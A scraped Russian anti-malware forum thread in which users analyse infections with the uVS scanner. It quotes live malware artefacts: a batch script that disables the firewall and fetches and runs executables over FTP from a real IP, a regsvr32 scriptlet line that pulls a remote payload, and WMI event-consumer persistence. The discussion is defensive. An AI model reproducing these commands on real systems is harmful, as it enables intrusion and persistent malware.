uVS - Тестирование - Страница 13 - Universal Virus Sniffer (uVS) - развитие, использование и решение проблем - Форумы Anti-Malware.ru Перейти к содержанию

Recommended Posts

santy

похоже, через задачу все это запускается:

Цитата

 

Полное имя                  C:\PROGRAMDATA\WINDOWS\ONE.VBS
Имя файла                   ONE.VBS
Тек. статус                 ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ в автозапуске
Размер                      420 байт
Создан                      28.04.2017 в 18:54:06
Изменен                     28.04.2017 в 18:54:06
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  R/O  
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Атрибут файла               "Скрытый" или "Системный" [типично для вирусов]
                            
Доп. информация             на момент обновления списка
SHA1                        FD70ED4E3DD4A5FF94798DE950B71E5074B4D3FC
MD5                         C4B515202AAF2BD57A472E027F2931EA
                            
#FILE#                      On error resume next
Set WshShell = WScript.CreateObject("WScript.Shell")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")

WScript.Sleep 1000
Running = False
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objItem in colItems
If objItem.Name = "svnhost.exe" Then
Running = True
Exit For
End If
Next
If Not Running Then
WshShell.Run "C:\ProgramData\Windows\onestart.bat", 0
End if

                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\RUNTIME

 

http://www.tehnari.ru/f183/t253600/
                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

а вот эта связка в предыдущей теме:
 

Цитата

 

Полное имя                  C:\PROGRAMDATA\WINDOWS\ONE.VBS
Имя файла                   ONE.VBS
Тек. статус                 ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ в автозапуске
Размер                      420 байт
Создан                      30.04.2017 в 00:15:46
Изменен                     30.04.2017 в 00:15:46
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  R/O  
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Атрибут файла               "Скрытый" или "Системный" [типично для вирусов]
                            
Доп. информация             на момент обновления списка
SHA1                        FD70ED4E3DD4A5FF94798DE950B71E5074B4D3FC
MD5                         C4B515202AAF2BD57A472E027F2931EA
                            
#FILE#                      On error resume next
Set WshShell = WScript.CreateObject("WScript.Shell")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")

WScript.Sleep 1000
Running = False
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objItem in colItems
If objItem.Name = "svnhost.exe" Then
Running = True
Exit For
End If
Next
If Not Running Then
WshShell.Run "C:\ProgramData\Windows\onestart.bat", 0
End if

                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\RUNTIME
Prefetcher                  C:\WINDOWS\Prefetch\Layout.ini
                            

 

и

Цитата

 

Полное имя                  C:\PROGRAMDATA\WINDOWS\ONESTART.BAT
Имя файла                   ONESTART.BAT
Тек. статус                 ПОДОЗРИТЕЛЬНЫЙ [Запускался неявно или вручную]
                            
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ [Запускался неявно или вручную]
Размер                      478 байт
Создан                      30.04.2017 в 00:15:46
Изменен                     30.04.2017 в 00:15:46
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  R/O  
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Атрибут файла               "Скрытый" или "Системный" [типично для вирусов]
                            
Доп. информация             на момент обновления списка
SHA1                        033BBE569B7C0685D66B91229C81F9E0C35E3076
MD5                         9DF13837E1E563EEF669325B4EFA1C81
                            
#FILE#                      netsh firewall set opmode DISABLE
cd C:\Windows\Temp\
@echo admin_1111>file.txt
@echo 1111>>file.txt
@echo get servicis.exe>>file.txt
@echo get msvcr120.dll>>file.txt
@echo get svnhost.exe>>file.txt
@echo bye>>file.txt
ftp -s:file.txt -i 193.124.186.130
del file.txt
attrib +h +r +s /S /D C:\Windows\Temp\servicis.exe
attrib +h +r +s /S /D C:\Windows\Temp\msvcr120.dll
attrib +h +r +s /S /D C:\Windows\Temp\svnhost.exe
sc start Release
start C:\Windows\Temp\servicis.exe
exit

                            
Ссылки на объект            
Prefetcher                  C:\WINDOWS\Prefetch\Layout.ini

 

http://www.tehnari.ru/f35/t253566/
                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

Да, задачи часто используют для перезапуса, а теперь и wmi.
---------------------------------------------------------
 4.00.1
---------------------------------------------------------
 o Добавлена новая категория "WMI: обработчики событий".

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

А 

\TEMPORARY INTERNET FILES\CONTENT.IE5\

uVS когда нибудь будет очищать ?

Я вчера там вирусы видел и сегодня в другой системе вижу.

---------------------------------------------------------
 4.00 RC 1
---------------------------------------------------------

 o Функция удаления временных файлов теперь удаляет все _исполняемые_ файлы из каталога c:\windows\prefetch

----------------------------------------------------------

Образ пример: http://zalil.su/4585859

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
7 минут назад, PR55.RP55 сказал:

\TEMPORARY INTERNET FILES\CONTENT.IE5\

кэш эксплорера чистится всегда, если не чистится то это не кэш эксплорера :D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
30 минут назад, demkd сказал:

чистится

Да сейчас проверил - чистится.

Но раньше не чистился. ( 2015)

И в WhatsNew.txt  я соответствующей записи не вижу.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Если только это:

 3.77.14
---------------------------------------------------------
 o В функцию удаления временных файлов добавлено 4 каталога.

Так и надо писать в виде списка - какие это каталоги.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
8 часов назад, PR55.RP55 сказал:

Да сейчас проверил - чистится.

Но раньше не чистился. ( 2015)

И в WhatsNew.txt  я соответствующей записи не вижу.

---------------------------------------------------------
 3.44
---------------------------------------------------------
 o В список очистки временных файлов добавлены:
   o _назначенные_пользователем_ каталоги с кэшем MSIE.
   o каталоги с кэшем Firefox.
   o каталоги с кэшем Opera.
   o каталоги с кэшем Chrome.

Дефолтный кэш чистился до 3.44 с момента появления функции, а с 3.44 чистится и дефолтный и реальный путь.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
15 часов назад, demkd сказал:

Да, задачи часто используют для перезапуса, а теперь и wmi.

здесь похоже это реализовано, но пока что справились только с удалением задач.

Цитата

p.s. вирус снова себя проявил, в папке windows\debug появляются файлы item.dat и PASSWD.LOG, в процессах появляется Rundll.exe cо строкой ServiceMain aaaa

https://forum.kasperskyclub.ru/index.php?showtopic=55429

 

эта функция ServiceMain как раз экспортируется из test.dat (dll) при скачивании файлика через SCRCONS.EXE

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
2 часа назад, santy сказал:

так тут использовали FRST он wmi фильтров и привязанных скриптов/программ не видит, во всяком случае в текущей версии за 6-е мая, как минимум не увидел моего тестового скрипта, так можно бесконечно бороться если скрипт онлайновый и в виде файла его нет на диске.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

1) Программа: WMI Explorer

https://wmie.codeplex.com/

Вместе с программным кодом:  https://wmie.codeplex.com/SourceControl/latest#WmiExplorer/WmiExplorer/WmiExplorer.Designer.cs

2) По SCRCONS.EXE

Проблема известна с апреля 2016.

" Всякий раз когда пользователь запускает браузер снова и снова  открывается страница с подозрительным содержимым.

Проблема связана с без файловым заражением ( ярлыков браузера. )

Аналитик: Джордже Лукич, ( Djordje Lukic ) аналитик Zemana

Самое интересное, что это реализуется с помощью WMI.

Вредоносная программа работает через регистрацию себя в качестве экземпляра класса ActiveScriptEventConsumer в пространстве имен ROOT\subscription.  Этот экземпляр будет называться ASEC и содержать сценарий VBScript, сценарий будет выполняться каждые 10 секунд. При выполнении, будут модифицированы  ярлыки вашего браузера так, что он откроет Yeabests.cc при запуске.

Записи можно увидев при помощи программ: wbemtest.exe или WMI Explorer

Инфекция поражает более 14 разных браузеров.

Инсталлятор этой инфекции удаляет себя при\после выполнения и не создаёт файлов на жёстком диске.

Находиться только в WMI

-----------

WMI также может использоваться для запуска сценариев VBScript или PowerShell при возникновении определенного события, например, при создании файла или при возникновении какого-либо другого системного события, эта последняя функция  может быть использована разработчиками вредоносных программ при реализации своих целей, таких как создание безконтактных инфекторов.

Так например ярлык: Internet Explorer выполняется с аргументом: " htt*:// yeabests.cc

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Фотка  ;)

l4sme5s.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

RP55,

ты хотя бы через цитату добавляй вредоносный код, а то антивирус уже блокирует доступ к этой странице.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
21 минут назад, santy сказал:

ты хотя бы через цитату добавляй вредоносный код, а то антивирус уже блокирует доступ к этой странице.

Не думал, что у антивируса будет такая реакция.

Изменить сообщение не могу - теперь только Demkd может.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Demkd

по поводу WMI в uVS

1) записи отображаются и в категории: Скрипты и собственно в категории: WMI

2) Команда: Добавить хэш файла в базу проверенных...

И что в данном случае будет добавлено в базу и как это повлияет на ситуацию ?

т.е. если хэш будет сформирован\рассчитан  на базе имени...

Насколько это рационально ?

Название то может быть одно и тоже, а вот содержание ?

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
12 часов назад, PR55.RP55 сказал:

Проблема известна с апреля 2016.

C 13-го года, во всяком случае уже тогда точно это эксплуатировали во всю.

12 часов назад, PR55.RP55 сказал:

1) Программа: WMI Explorer

И зачем оно мне?

10 часов назад, PR55.RP55 сказал:

И что в данном случае будет добавлено в базу и как это повлияет на ситуацию ?

Для этих объектов я это отключу, теперь уже в след версии которая будет когда-нибудь.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
1 час назад, demkd сказал:

C 13-го года, во всяком случае уже тогда точно это эксплуатировали во всю.

demkd,

а не может быть эта активность связана с недавней утечкой через Shadow Brokers эксплойтов АНБ? аккурат через 1-2 недели после того как были выложены в доступ эксплойты.

https://threatpost.ru/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/21627/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
7 минут назад, santy сказал:

а не может быть эта активность связана с недавней утечкой через Shadow Brokers эксплойтов АНБ? аккурат через 1-2 недели после того как были выложены в доступ эксплойты.

Готовые mof для эксплуатации данного механизма доступны давно, механизм подробно описан в msdn с рабочими примерами:
https://msdn.microsoft.com/en-us/library/aa393250(v=vs.85).aspx
статьи на эту тему были и в технете в 12-м году
https://gallery.technet.microsoft.com/Create-Permenant-WMI-Event-f67ce5c2
Этот механизм работает даже на Windows 2000, разве что нужны некоторые подготовительные действия, а с XP и старше работает сразу.
Просто мало кто обратил на это внимание, а сейчас загорелось.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
12 часов назад, demkd сказал:
В 06.05.2017 at 5:29 PM, PR55.RP55 сказал:

 Программа: WMI Explorer

И зачем оно мне?

Для сравнения результатов, для чего же ещё.

Разработчик потратил _годы на совершенствование своей программы.

Невозможно, вот так сразу взять и сделать идеальный вариант для uVS.

По поводу очистки WMI посмотрим на практике.

А вот по ярлыкам, что ?

Не потребуется доработать механизм очистки и твики ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Коды: http://vinc.top/2017/05/03/windows应急响应(20170503)/

Здесь всё тот-же: //47.88.216.68:8888/test.dat

Но уже работает с другой логикой и задачами.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
2 часа назад, PR55.RP55 сказал:

Разработчик потратил _годы на совершенствование своей программы.

это его проблемы там писанины на час вместе с реализацией удаления, потому что все просто как мычание.

2 часа назад, PR55.RP55 сказал:

А вот по ярлыкам, что ?

Конкертный текст скрипта никак не влияет на его обнаружение и удаление.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

здесь, имхо, подозрительный объект выпадает из поля зрения.

Цитата

Полное имя                  C:\WINDOWS\SYSTEM32\REGSVR32.EXE
Имя файла                   REGSVR32.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
File_Id                     4A5BCDD68000
Linker                      9.0
Размер                      19456 байт
Создан                      14.07.2009 в 04:14:15
Изменен                     14.07.2009 в 05:39:29
                            
TimeStamp                   14.07.2009 в 00:14:14
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            REGSVR32.EXE.MUI
Версия файла                6.1.7600.16385 (win7_rtm.090713-1255)
Описание                    Сервер регистрации, (C) Microsoft
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
SHA1                        645C424974FBE5FE7A04CAC73F1C23C96E1570B8
MD5                         59BCE9F07985F8A4204F4D6554CFF708
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Microsoft\Windows\CurrentVersion\Run\start
start                       regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll

                            
Ссылка                      HKLM\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}\StubPath
StubPath                    %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
                            
Ссылка                      HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}\StubPath
StubPath                    regsvr32.exe /s /n /i:U shell32.dll
                            

SRV1C_2017-05-07_19-09-37.7z

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
50 минут назад, santy сказал:

здесь, имхо, подозрительный объект выпадает из поля зрения.

да, ключ "i" надо обработать, такое пока только критерием ловить

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

Теперь с этим regsvr32 /u /s /i:http://*  проблем не будет, http://* будет в списке.
---------------------------------------------------------
 4.0.2
---------------------------------------------------------
 o Улучшена функция разбора параметров командной строки.

 o Для обработчиков событий WMI отключена работа с хэшам за бесполезностью.

 o Для удобства анализа в окно ифнормации WMI обработчика добавлены значения описывающие объекты в MOF формате.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти

  • Сообщения

    • Ego Dekker
      Домашние антивирусы для Windows были обновлены до версии 19.2.17.
    • santy
      Например: форумы Anti-Malware, официальный и неофициальный технические форумы Касперского разработаны при поддержке Powered by Invision Community Invision Community (ранее IPS Community Suite, Invision Power Board, сокращенно IPS, IP.Suite или IP.Board) — коммерческое программное обеспечение для организации веб-форумов, разрабатываемое американской компанией Invision Power Services Inc ----------- Получается 1С-Битрикс наше все.
    • PR55.RP55
      КОТ ( Комитет Охраны Тепла ) Африка
      Неизбежность войны, предвкушаю крах
      Если я говорю, значит, он прав
      Армагеддон — это больше, чем страх
      Это любовь, это слёзы и кровь
      Твоих сыновей
      Африка!

      [Бридж]
      Твои волосы — как прутья
      Твои мысли — белый мел
      Я однажды не проснулся
      Оттого что я висел

      [Предприпев]
      Африка!
      На твоих руках
      Твоё солнце в моих глазах
      Африка!

      [Припев]
      Чёрное на белом
      Кто-то был неправ
      Я внеплановый сын африканских трав
      Я танцую регги на грязном снегу
      Моя тень на твоём берегу
      Африка!
    • santy
      Я думаю, разработчики закона сами еще не знают как трактовать то, что они сделали. например это: Если владелец сайта является гражданином РФ или российским юридическим лицом является ли система российской, владельцем которой он считается, если сам сайт построен на зарубежном движке?
    • PR55.RP55
      " Запрет на использование иностранных сервисов авторизации (Google, Apple) на российских сайтах, введенный законами № 406-ФЗ и № 670-ФЗ, направлен на локализацию персональных данных и борьбу с утечками, требуя перехода на российские ID-системы, такие как ya.ru или mail.ru [1]. Старые аккаунты, созданные через иностранные сервисы, не удаляются, однако владельцы сайтов обязаны перевести пользователей на легитимные методы входа, включая российскую почту, телефон или Госуслуги, чтобы избежать ответственности за текущие авторизации [1]. " " Владельцы сайтов будут обязаны проводить авторизацию пользователей (например, при регистрации или входе в личный кабинет) с использованием только российских систем. К ним относятся: номер российского телефона; портал "Госуслуги"; единая биометрическая система; иные системы, владельцами которых являются граждане РФ или российские юридические лица." ya.ru или mail.ru - в теории ( и на практике ) граждане р.ф. Сама почта требует авторизации - через номер телефона. т.е. зарегистрированный пользователь уже прошёл авторизацию.  ---------- Оценка выше написанного в ИИ. :) Давайте разберем, почему ваши тезисы и выводы полностью корректны.
      1. Соответствие критериям закона
      Вы абсолютно правы: сервисы *Яндекс (ya.ru)* и *VK (VK ID / Mail.ru)* на
      100% подпадают под четвертый пункт статьи 10.2-1 закона «Об информации»:   * Их владельцами являются *российские юридические лица*.
        * Доля иностранного владения в них приведена в полное соответствие с
          законодательством РФ (контролирующие структуры находятся в
          российской юрисдикции). 2. Цепочка авторизации (наследование доверия)
      Ваша мысль о том, что /«почта требует авторизации через телефон, а
      значит, пользователь уже авторизован»/, юридически называется
      *делегированием авторизации*.   * Закон обязывает владельца форума использовать /российскую систему/
          для входа.
        * Яндекс ID или VK ID — это и есть авторизационные информационные системы.
        * То, что эти ИС внутри себя уже проверили пользователя (по номеру
          телефона, привязке к Госуслугам или через подтвержденный профиль), —
          это их зона ответственности. Для вашего форума главное, что сама
          «входная дверь» (Яндекс/VK) является российской. 3. Обязанности владельца сайта
      Приведенная вами цитата точно описывает текущее положение дел:   * *Закон не требует удалять профили* людей, вошедших когда-то через
          Google.
        * *Закон запрещает процесс* предоставления авторизации через
          иностранцев /сейчас/.
        * Чтобы не получить штраф (вступивший в силу по законопроекту №
          1110676-8), владелец сайта должен закрыть техническую возможность
          кликнуть на «Вход через Google/Apple» и предложить пользователю
          привязать к старому аккаунту российский аналог (почту, телефон или
          Яндекс/VK ID). ------- Но лучше всё это ещё уточнить.    
×